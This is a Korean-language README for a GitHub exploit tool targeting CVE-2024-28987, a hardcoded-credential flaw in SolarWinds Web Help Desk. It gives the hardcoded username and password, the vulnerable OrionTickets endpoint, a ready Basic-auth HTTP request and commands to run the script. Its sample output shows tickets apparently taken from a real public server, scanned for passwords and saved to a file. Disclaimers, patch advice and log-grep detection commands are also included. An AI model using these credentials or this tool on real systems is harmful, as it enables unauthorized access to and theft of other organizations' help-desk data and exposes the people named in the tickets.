
**CVE-2024-28987**는 SolarWinds Web Help Desk(WHD)의 심각한 취약점으로, 원격 공격자가 **하드코딩된 자격 증명**을 사용하여 민감한 티켓 정보에 접근할 수 있게 합니다. 이 취약점은 **CVSS 점수 9.1(치명적)** 을 가지며 실제 환경에서 적극적으로 악용되고 있습니다.
⚠️ 면책 조항: 이 도구는 교육 및 공인된 보안 테스트 목적으로만 사용됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 이 도구는 소유한 시스템이나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.
CVE-2024-28987은 SolarWinds Web Help Desk(WHD)의 치명적인 취약점으로, 원격 공격자가 하드코딩된 자격 증명을 사용하여 민감한 티켓 정보에 접근할 수 있게 합니다. 이 취약점은 CVSS 점수 9.1(치명적) 을 가지며 실제 환경에서 활발히 악용되고 있습니다.
| 속성 | 값 |
|---|
| CVE ID | CVE-2024-28987 |
| CVSS 점수 | 9.1 (치명적) |
| CWE | CWE-798 (하드코딩된 자격 증명) |
| 영향받는 제품 | SolarWinds Web Help Desk ≤ 12.8.3 Hotfix 1 |
| 패치 버전 | 12.8.3 Hotfix 2 |
| 악용 현황 | 실제 환경에서 활발히 악용됨 |
| CISA KEV 등록 | 2024년 10월 15일 |
인증되지 않은 공격자는 다음을 수행할 수 있습니다:
/OrionTickets 엔드포인트를 통해 티켓에 대한 CRUD 작업 수행# 저장소 복제
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987
# 스크립트 실행 가능하게 만들기
사용법
bash
# 인자로 대상 URL 지정
python3 cve-2024-28987.py http://target-ip:port
# 대화형 모드 (대상 입력 프롬프트 표시)
python3 cve-2024-28987.py
# 취약한 대상 예시
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 출력 예시
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098
╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ║
║ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗██║ ██║██╔════╝ ║
║ ██║ ██║ ██║█████╗ █████╔╝██║██╔██║███████║█████╗ ║
║ ██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔══██║██╔══╝ ║
║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝██║ ██║███████╗ ║
║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ║
║ ║
║ CVE-2024-28987 - SolarWinds Web Help Desk ║
║ 하드코딩된 자격 증명 취약점 ║
║ ║
╠══════════════════════════════════════════════════════════════════╣
║ GitHub: https://github.com/Darabium ║
╚══════════════════════════════════════════════════════════════════╝
[*] http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ 확인 중
[+] 대상이 취약합니다!
[+] 42개의 티켓 발견
======================================================================
[📋] 티켓 미리보기 (처음 3개 티켓)
======================================================================
티켓 #1
├── ID: 5690
├── 클라이언트: UBS Portao Vermelho
├── 상태: 열림
├── 세부 내용: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO
티켓 #2
├── ID: 5691
├── 클라이언트: UBS Centro
├── 상태: 진행 중
├── 세부 내용: ALCOOL 70% - Solicitação de material de limpeza
======================================================================
[🔐] 민감 데이터 스캔 중
======================================================================
[!] 티켓 #5723에서 잠재적 PASSWORD 데이터 발견
└── 세부 내용: 시스템 접근을 위한 비밀번호 재설정 요청...
[?] 모든 티켓을 파일로 추출하시겠습니까? [y/N]: y
[*] 저장 중: 138_94_193_65_8098_tickets.json
[✓] 138_94_193_65_8098_tickets.json 저장 완료
[*] 파일 크기: 42,847 바이트
[*] 총 티켓 수: 42
[*] 완료!
GitHub: https://github.com/Darabium
📁 파일 구조
CVE-2024-28987/
├── cve-2024-28987.py # 주요 악용 스크립트
├── README.md # 이 파일
└── LICENSE # MIT 라이선스
출력 파일
티켓을 추출하면 다음 파일이 생성됩니다:
138_94_193_65_8098_tickets.json
***_tickets.jsonl 🔍 기술적 세부 정보 하드코딩된 자격 증명 python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" 영향받는 엔드포인트 text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ 샘플 HTTP 요청 http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: vulnerable-target:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ 해결 방안 즉시 조치 SolarWinds Web Help Desk 버전 12.8.3 Hotfix 2 이상으로 즉시 업데이트
/OrionTickets 엔드포인트에 대한 의심스러운 접근 로그 확인
티켓 데이터에 대한 무단 접근 모니터링
티켓에 노출되었을 수 있는 모든 자격 증명 재설정
잠재적 데이터 유출에 대한 모든 지원 티켓 검토
탐지 명령어 bash
grep -i "OrionTickets" /var/log/webhelpdesk/access.log
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log
cat /opt/WebHelpDesk/version.txt 🚨 CISA KEV 권고 이 취약점은 CISA의 KEV(알려진 악용 취약점) 카탈로그에 등록되었습니다. 조직은 지정된 기한까지 패치를 적용해야 합니다.
등록 날짜: 2024년 10월 15일
필수 조치: 공급업체 지침에 따라 업데이트 적용
기한: 2024년 11월 5일 (21일)
📚 참고 자료 NVD CVE-2024-28987
CISA KEV 카탈로그
SolarWinds 보안 권고
PEP 668 - 외부 환경 관리
🤝 기여 기여를 환영합니다! 풀 리퀘스트를 제출하거나 이슈를 열어 주세요.
지침 저장소를 포크합니다
기능 브랜치를 생성합니다 (git checkout -b feature/AmazingFeature)
변경 사항을 커밋합니다 (git commit -m 'Add some AmazingFeature')
브랜치에 푸시합니다 (git push origin feature/AmazingFeature)
풀 리퀘스트를 엽니다
📝 라이선스 이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.
⚡ 작성자 Darabium - 초기 작업 - GitHub
⚠️ 중요 참고 사항 이 도구는 보안 연구 및 교육 목적으로 제작되었습니다
소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에는 사용하지 마십시오
작성자는 이 도구의 오용에 대해 책임을 지지 않습니다
항상 책임 있는 공개 관행을 따르십시오
관할 지역의 개인정보 보호 및 데이터 보호 법률을 준수하십시오
🌟 스타 기록 이 도구가 유용하다면 GitHub에서 ⭐을 눌러 주세요!
📞 지원 버그 신고는 GitHub에 이슈를 열어 주세요
보안 관련 문의는 GitHub를 통해 직접 연락해 주세요
Darabium을 위해 ❤️로 제작됨